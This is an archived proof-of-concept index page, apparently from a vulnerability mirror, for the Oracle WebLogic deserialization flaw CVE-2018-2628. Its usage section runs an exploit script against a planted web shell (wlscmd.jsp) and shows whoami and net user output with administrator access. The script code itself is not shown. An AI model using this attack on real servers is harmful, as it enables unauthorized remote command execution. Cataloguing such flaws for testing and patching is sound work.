CVE-2018-2628 PoC — Oracle Fusion Middleware 代码问题漏洞

Source

https://github.com/likekabin/CVE-2018-2628

Associated Vulnerability

Title:Oracle Fusion Middleware 代码问题漏洞 (CVE-2018-2628)
Description:Oracle WebLogic Server是美国甲骨文（Oracle）公司的一款适用于云环境和传统环境的应用服务器，它提供了一个现代轻型开发平台，支持应用从开发到生产的整个生命周期管理，并简化了应用的部署和管理。WLS Core是其中的一个核心组件。 Oracle WebLogic Server中的WLS核心组件存在远程代码执行漏洞。攻击者可通过远程发送攻击数据，借助T3协议在WebLogic Server中执行反序列化操作利用该漏洞执行代码。以下版本受到影响：Oracle WebLogic Serve

Readme

# CVE-2018-2628


### 0x01 Nessus Scan

![](./images/CVE-2018-2628-scan.jpg)


### 0x02 K8 Tools GetShell

![](./images/GetShell.PNG)


### 0x03 CMD Query

![](./images/cmd.jpg)


#####  Use-Method:

```
> python cve-2018-2628.py

set url :http://xx.xx.xx.xx:8001/bea_wls_internal/wlscmd.jsp
cmd >>: whoami

win-xxx8cb989qh\administrator

cmd >>: net user

\\WIN-XXX8CB989QH 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest
命令成功完成。

cmd >>:
```

File Snapshot


 [4.0K]  /data/pocs/a8738cb75bc466e56879c551f025dbba77741221
├── [ 915]  cve-2018-2628.py
├── [4.0K]  images
│   ├── [260K]  cmd.jpg
│   ├── [275K]  CVE-2018-2628-scan.jpg
│   └── [110K]  GetShell.PNG
├── [  52]  push.sh
└── [ 538]  README.md

1 directory, 6 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!